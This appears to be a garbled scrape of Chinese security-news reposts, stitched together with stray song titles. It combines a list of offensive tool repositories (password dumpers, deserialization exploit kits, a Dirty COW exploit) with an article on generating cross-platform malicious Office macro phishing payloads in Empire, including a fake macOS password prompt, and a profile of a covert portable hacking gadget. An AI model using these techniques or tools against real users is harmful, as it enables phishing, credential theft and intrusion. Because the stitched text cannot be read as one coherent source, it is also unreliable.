Niobe’s Run Don Davis – Matrix Revolutions: The Motion Picture Soundtrack (U.S. Version)

https://github.com/0xwindows/VulScritp               (企业内网渗透脚本,包括banner扫描、端口扫描;各种通用漏洞利用等)

https://github.com/lcatro/network_backdoor_scanner (基于网络流量的内网探测框架)

https://github.com/fdiskyou/hunter            (调用 Windows API 枚举用户登录信息)

https://github.com/BlackHole1/WebRtcXSS (自动化利用XSS入侵内网)

https://github.com/AlessandroZ/LaZagne    (本机密码查看提取工具)

https://github.com/huntergregal/mimipenguin (linux密码抓取神器)

端口扫描、指纹识别以及中间件扫描Invisible (隐形) Linkin Park – One More Light

https://nmap.org/download.html        (Nmap端口扫描器之王,https://svn.nmap.org/)

https://github.com/ring04h/wyportmap  (目标端口扫描+系统服务指纹识别)

https://github.com/ring04h/weakfilescan (动态多线程敏感信息泄露检测工具)

https://github.com/EnableSecurity/wafw00f (WAF产品指纹识别)

https://github.com/rbsec/sslscan (ssl类型识别)

https://github.com/urbanadventurer/whatweb (web指纹识别)

https://github.com/tanjiti/FingerPrint (web应用指纹识别)

https://github.com/nanshihui/Scan-T (网络爬虫式指纹识别)

https://github.com/OffensivePython/Nscan (a fast Network scanner inspired by Masscan and Zmap)

https://github.com/ywolf/F-NAScan (网络资产信息扫描, ICMP存活探测,端口扫描,端口指纹服务识别)

https://github.com/ywolf/F-MiddlewareScan (中间件扫描)

https://github.com/maurosoria/dirsearch (Web path scanner)

https://github.com/x0day/bannerscan (C段Banner与路径扫描)

https://github.com/RASSec/RASscan (端口服务扫描)

https://github.com/3xp10it/bypass_waf (waf自动暴破)

https://github.com/3xp10it/xcdn (尝试找出cdn背后的真实ip)

https://github.com/Xyntax/BingC (基于Bing搜索引擎的C段/旁站查询,多线程,支持API)

https://github.com/Xyntax/DirBrute (多线程WEB目录爆破工具)

https://github.com/zer0h/httpscan (一个爬虫式的网段Web主机发现小工具)

https://github.com/lietdai/doom (thorn上实现的分布式任务分发的ip端口漏洞扫描器)

https://github.com/chichou/grab.js (类似 zgrab 的快速 TCP 指纹抓取解析工具,支持更多协议)

https://github.com/Nitr4x/whichCDN (CDN识别、检测)

https://github.com/secfree/bcrpscan (基于爬虫的web路径扫描器)

针对性漏洞测试工具Kidfried Don Davis – Matrix Revolutions: The Motion Picture Soundtrack (UK Version)

https://github.com/brianwrf/hackUtils (java反序列化利用工具集)

https://github.com/frohoff/ysoserial ( java反序列化利用工具)

https://github.com/blackye/Jenkins (Jenkins漏洞探测、用户抓取爆破)

https://github.com/code-scan/dzscan (discuz漏洞扫描)

https://github.com/chuhades/CMS-Exploit-Framework (CMS攻击框架)

https://github.com/lijiejie/IIS_shortname_Scanner (IIS短文件名漏洞扫描)

https://github.com/riusksk/FlashScanner (flashxss扫描)

https://github.com/coffeehb/SSTIF (服务器端模板注入漏洞的半自动化工具)

https://github.com/epinna/tplmap (服务器端模板注入漏洞检测与利用工具)

https://github.com/cr0hn/dockerscan (docker扫描工具)

https://github.com/GoSecure/break-fast-serial (借助DNS解析来检测Java反序列化漏洞工具)

https://github.com/dirtycow/dirtycow.github.io (脏牛提权漏洞exp)

无线网络渗透、扫描Numb Linkin Park – Meteora

https://github.com/savio-code/fern-wifi-cracker/ (无线安全审计工具)

https://github.com/m4n3dw0lf/PytheM (Python网络/渗透测试工具)

https://github.com/P0cL4bs/WiFi-Pumpkin (无线安全渗透测试套件)

代码静态扫描、代码运行栈跟踪

https://github.com/exakat/php-static-analysis-tools (php静态扫描工具集)

https://github.com/wufeifei/cobra (白盒代码安全审计系统)

https://github.com/OneSourceCat/phpvulhunter (静态php代码审计)

https://github.com/Qihoo360/phptrace (跟踪、分析PHP运行情况的工具)

https://github.com/ajinabraham/NodeJsScan (NodeJS应用代码审计)

https://github.com/pwnsdx/BadCode   (PHP代码审计)

https://github.com/thesp0nge/dawnscanner (ruby源码审计)

https://github.com/presidentbeef/brakeman  (Ruby on Rails应用程序的安全漏洞)

https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/    (app黑盒审计)

https://github.com/alibaba/iOSSecAudit   (iOS安全审计)

模块化扫描、综合扫描器Whoami? ARGY & MAMA – Recluse

https://github.com/az0ne/AZScanner (自动漏洞扫描器,子域名爆破,端口扫描,目录爆破,常用框架漏洞检测)

https://github.com/blackye/lalascan (分布式web漏洞扫描框架,集合owasp top10漏洞扫描和边界资产发现能力)

https://github.com/blackye/BkScanner (BkScanner 分布式、插件化web漏洞扫描器)

https://github.com/ysrc/GourdScanV2 (被动式漏洞扫描)

https://github.com/alpha1e0/pentestdb (WEB渗透测试数据库)

https://github.com/netxfly/passive_scan (基于http代理的web漏洞扫描器)

https://github.com/1N3/Sn1per (自动化扫描器,包括中间件扫描以及设备指纹识别)

https://github.com/RASSec/pentestEr_Fully-automatic-scanner (定向全自动化渗透测试工具)

https://github.com/3xp10it/3xp10it (自动化渗透测试框架)

https://github.com/Lcys/lcyscan (扫描效果未验证)

https://github.com/Xyntax/POC-T (渗透测试插件化并发框架)

https://github.com/v3n0m-Scanner/V3n0M-Scanner (Scanner in Python3.5 for SQLi/XSS/LFI/RFI and other Vulns)

https://github.com/Skycrab/leakScan (web端的在线漏洞扫描)

https://github.com/zhangzhenfeng/AnyScan (开发中...)

Android系列工具:

http://sec-redclub.com/index.php/archives/439/

DDOS防护:

https://github.com/ywjt/Dshield

Database firewall:

https://nim4.github.io/DBShield/

waf开源及规则:

https://github.com/xsec-lab/x-waf

https://github.com/loveshell/ngx_lua_waf


https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/base_rules

收集目的

本仓库收集的初衷是向各类行业安全从业人员提供在企业信息安全防护体系建设过程中可以参考的各种开源或非开源安全扫描工具,以帮助安全从业人员对自身业务进行自检,从而提高安全性。

免责说明

请勿用于非法的用途,否则造成的严重后果与本项目无关。

参考链接:github

*本文作者:n0h4ck_team,资料由CTNN收集,转载请注明FreeBuf.COM

跨平台宏钓鱼攻击Payload的介绍及使用方式

对于渗透测试人员来说,通过Microsoft Office Word文档或Excel电子表格来实现网络钓鱼是一种非常常见的技术,而随着越来越多的企业开始部署Mac终端,跨平台的恶意宏Payload也逐渐变得越来越重要了。

跨平台宏钓鱼攻击Payload的介绍及使用方式

之前的研究

来自Black Hills安全公司的研究团队目前能够使用Empire并通过手动方式生成跨平台的恶意宏Payload,而我们的团队也可以通过配合Empire和Cobalt Strike Payload来生成恶意Office宏Payload。现在,最困难的那部分工作我们已经帮大家完成了:我们基于@enigma0x3@harmj0y的原始恶意宏模块开发了一款新版本的Empire模块,而这个新的模块能够适用于Windows和Mac平台。

Empire项目主页

点我访问

工具简介

跨平台宏钓鱼攻击Payload的介绍及使用方式

在Empire中,我们需要设置一个监听器,然后运行命令“usestager multi/macro” ,命令后面加上”info”便能够查看到相关的设置选项以及介绍信息:

跨平台宏钓鱼攻击Payload的介绍及使用方式

命令运行之后,将会生成一个宏,你可以直接将其复制粘贴到宏编辑器中,之后你还可以直接将其发送给你的目标用户。

在宏文件开始运行之后,它首先会检测当前的运行平台及环境,如果当前环境为macOS的话,它将会加载Office 016 for Mac版所需的一些dylib文件(默认运行在macOS沙箱环境中)。当恶意Office文档被打开之后,宏的功能便会被触发。

接下来,文档还会检测当前的操作系统版本。如果是macOS,恶意宏将会通过shell命令调用curl来访问一个追踪URL。宏Payload剩余的部分跟之前针对Mac的Empire宏Payload类似,都是一些Python Payload。如果是Windows,宏将会调用XMLHTTP并访问一个追踪URL,而剩余部分则是跟Windows的Empire宏Payload类似,都是一些PowerShell Payload。

追踪URL可以帮助攻击者来分析和判断文档是否被打开过(不涉及Shell命令,因为终端保护工具或网络IPS有可能屏蔽代码执行或通讯信息),默认配置下追踪URL指向的是localhost,不过用户也可以自行选择使用第三方像素/广告追踪服务或使用自己的Web服务器以及域名来配置Empire选项中的追踪URL。

跨平台宏钓鱼攻击Payload的介绍及使用方式

如果你想根据目标操作系统来选择使用不同类型的Payload,你可以使用Empire来生成跨平台宏然后替换掉宏文件中不同操作系统部分的Payload代码。比如说,你可以生成一个Gobalt Strike宏payload,然后将其复制粘贴到Windows Empire Payload中,并用新生成的Empire跨平台宏替换掉代码中有关Windows的那个部分。这样一来,我们不仅可以使用很多新的功能,而且仍然能够保持恶意宏的跨平台特性。

在macOS中,即使处于沙盒环境,攻击者仍然可以利用存在漏洞的AppleScript(“osascript”)工具来生成钓鱼窗口并尝试欺骗用户输入自己的密码,不过沙盒的限制仍然会对该工具产生影响。因此,我们团队的@DisK0nn3cT向Empire模块中添加了一个关于沙盒模式的新功能(“usemodule python/collection/prompt”),并能够利用macOS文件路径来绕过某些沙盒限制,因此攻击者仍然可以在macOS下触发钓鱼窗口。

* 参考来源:medium, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

善其事利其器,看那些安全研究者手中的“利器”

一年一度的DefCon大会每年都会吸引全球的黑客慕名而来,它提供了一个结交朋友,展示实力的平台。但是,如果有人拖着重重的装备,这不仅需要他们拥有强健的肌肉,而且还会引起人们的注意。

善其事利其器,看那些安全研究者手中的“利器”

EI Kentrao想要打造一个功能强大的黑客工作站(Hack Chip),同时又希望它有很好的便携性,不那么显眼。直到遇见Pocket CHIP——便携性很强的掌上计算机时,终于让他等到了机会。Pocket CHIP在设计上非常容易被黑客改装,但它最初的设计定位是便携性很强的复古游戏机。

善其事利其器,看那些安全研究者手中的“利器”

但 EI Kentrao也知道在 Pocket CHIP 上运行的是一套完善的 Linux系统,破解起来并没有那么容易。所以 Kentrao在做完简单的系统偏好设置之后,首先安装了 Aircrack-ng ,可以用来嗅探无线网络,他手里还有一个 Ubertooth One 了(尽管它的价格已经是Pocket CHIP 的两倍了),于是他将 Ubertooth One、蓝牙适配器还有BlueHydra(用来进行蓝牙攻击)都集成进了 Pocket CHIP 中。

下一步就是要对 Linux 系统做一些定制和在硬件上做一些修改了。Kentrao换掉了无聊的开机画面,启动页上也加上了自己的黑客软件,这样软件的启动速度可以更快。 PocketCHIP 本身只有一个USB接口,所以还要再加上USB集线器。有时手指触控屏幕不灵敏的时候,可能会用到触控笔,他也在设备的外壳专门打了一个洞来放笔。

善其事利其器,看那些安全研究者手中的“利器”

他随后又安装了更多的软件,包括:Mosh(一个非常适合移动设备的SSH客户端工具),Hastebin(用来记录数据)以及 Horst(WiFi扫描分析器)。他还专门写了一个脚本,用来快速扫描周边区域的网络情况。以上的这些装备可以让Kentaro很好的查看周围的网络情况,这样在人群密集的地方也不会显得很突兀。

只有蓝牙和 WiFi 功能还不够,Kentrao 还需要一个可以RFID(射频识别) 的工具,幸运的是,在他的桌子上,找到了已经吃灰的 Proxmark3 。Proxmark3 同样也很昂贵,但功能也很强大,它可以帮你完成所有关于射频设别的工作。可以进行扫描、破解、克隆 RFID 卡和标签、模拟卡片与读卡器的功能(或者两者之间的通讯)。

善其事利其器,看那些安全研究者手中的“利器”

装备了这么多东西之后, Hack Chip 就有点像科学怪人( Frankenstein)的产物了,于是 Kentaro 决定对其做一些减法,让它看起来不那么显眼。(Hack Chip 里面塞了太多的设备,需要精简一下)于是他加入了无线充电功能(无线充电口一开始还是比较难加的),Kentaro还想增添一些乐趣,所以还为它植入内窥镜,并且看起来效果还不错。

善其事利其器,看那些安全研究者手中的“利器”

现在, Hack Chip 身上已经集成了很多便于拆装的黑客小组件,但是 Kentaro 还不满意,并且正在开发一个 Hack Chip 配件——一个树莓派盒子,它可以偷偷监控那些已经被 Hack Chip 破解过的网络,记录相关数据,并将这些数据不断地发送到 Hack Chip 上。

*参考来源:blog.hackster.io ,FB小编Liki编译,转载请注明来自FreeBuf.COM